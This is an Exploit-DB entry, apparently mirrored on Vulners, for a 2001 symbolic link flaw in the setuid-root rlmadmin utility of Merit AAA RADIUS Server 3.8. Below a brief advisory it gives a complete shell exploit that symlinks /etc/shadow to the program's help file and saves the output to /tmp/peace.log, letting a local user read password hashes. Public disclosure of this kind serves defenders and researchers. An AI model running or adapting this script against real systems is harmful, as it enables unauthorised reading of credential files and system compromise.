Lucene search
K

Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link

🗓️ 07 Sep 2001 00:00:00Reported by Digital ShadowType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Merit AAA RADIUS Server vulnerable to symbolic link attack, risking sensitive data exposure.

Code
source: https://www.securityfocus.com/bid/3302/info


The 'rlmadmin' user management utility included with the Merit AAA RADIUS Server package is susceptible to a trivial symbolic link attack. The program allows users to specify a directory from which configuration files should be loaded at runtime. A help file, 'rlmadmin.help', is loaded from this directory and displayed directly to the user when the program is run.

The vulnerability exists because the program is setuid root and does not check if the help file is symbolically linked before displaying its contents to the user. As a local user, it is trivial for a local user to read any file on the system. This may lead to the disclosure of sensitive data and system compromise. 

#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability #
# (c)oded 2001 Digital Shadow #
# www.ministryofpeace.co.uk #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
bloc=/usr/private/etc # executable file location
cloc=/usr/private/etc/raddb # config file location
file=/etc/shadow # file to read
echo == rlmadmin exploit - visit www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log! 

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation